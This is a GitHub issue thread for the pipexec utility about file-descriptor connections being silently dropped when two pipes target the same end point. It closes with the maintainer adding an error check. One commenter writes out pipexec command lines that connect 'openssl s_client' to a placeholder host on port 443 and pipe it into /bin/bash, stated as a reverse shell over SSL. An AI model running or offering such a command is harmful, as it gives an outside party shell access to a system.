### ISSUE TITLE
FD connection silently discarded on conflict

### ISSUE THREAD

**Issue by majewsky** [flonatel/pipexec#12]
I started with a simple bidirectional pipe:

``` bash
$ pipexec -- [ A ... ] [ B ... ] "{A:1>B:0}" "{B:1>A:0}"
```

Then I also wanted to send the standard error of A into B, so I naively wrote:

``` bash
$ pipexec -- [ A ... ] [ B ... ] "{A:1>B:0}" "{A:2>B:0}" "{B:1>A:0}"
```

That causes the standard output of A to be discarded silently, instead of being sent to B. I understand why this would occur, and how to fix it with `peet`, but it'd would be nice to see an error message when a file descriptor is referenced twice.

**Comment by flonatel** [comment]
Yes - you are right.  This is an idea for a good improvement.

**Comment by jensolsson** [comment]
@majewsky how to do this with peet? Tried this to make a reverse shell over ssl but no data seem to be sent at all

./pipexec -- [ openssl /usr/bin/openssl s_client -connect ip:443 -quiet ] [ sh /bin/bash ] [ peet /root/peet 1 2 ] "{openssl:1>sh:0}" "{sh:1>peet:1}" "{sh:2>peet:2}" "{peet:0>openssl:0}"

The following work fine but only for stdout, stderr is just not sent over.

./pipexec -- [ openssl /usr/bin/openssl s_client -connect ip:443 -quiet ] [ sh /bin/bash ] "{openssl:1>sh:0}" "{sh:1>openssl:0}"

**Comment by SupraSummus** [comment]
@jensolsson I think you shouldn't force peet to read from fd 1, because it may clash with stdout. It's safe to leave fd 2 unused too.

    bin/pipexec -- [ a /usr/bin/echo a ] [ b /usr/bin/echo b ] [ peet bin/peet 0 3 ] [ cat /usr/bin/cat ] "{a:1>peet:0}" "{b:1>peet:3}" "{peet:1>cat:0}"

(It seems like there is a race condition in above example, because sometimes I get "a b" output, and sometimes just "a" or just "b".)

Another way would be to use `-w` option for peet and set it to 0, but I haven't tested if it works.

Also you can check out [my implementation of similar utility (pgspawn)](https://github.com/SupraSummus/pgspawn), which does checks for FD collisions and warns the user. It supports multiple redirections to single FD with no need for `peet`.

**Comment by flonatel** [comment]
Thanks for reporting this.
The latest commit [1] adds a check for duplicate pipe end points.

    $ ./bin/pipexec -- '[' A /bin/true ']' '[' B /bin/false ']' '{A:1>B:0}' '{A:2>B:0}'
    ERROR: Duplicate pipe in command line: [to] [B] [0]

[1] https://github.com/flonatel/pipexec/commit/422c5e528dd646b59e23cfe9b45c338ec1a38a24

I hope this fixes the problem. Therefore I'll close this issue.
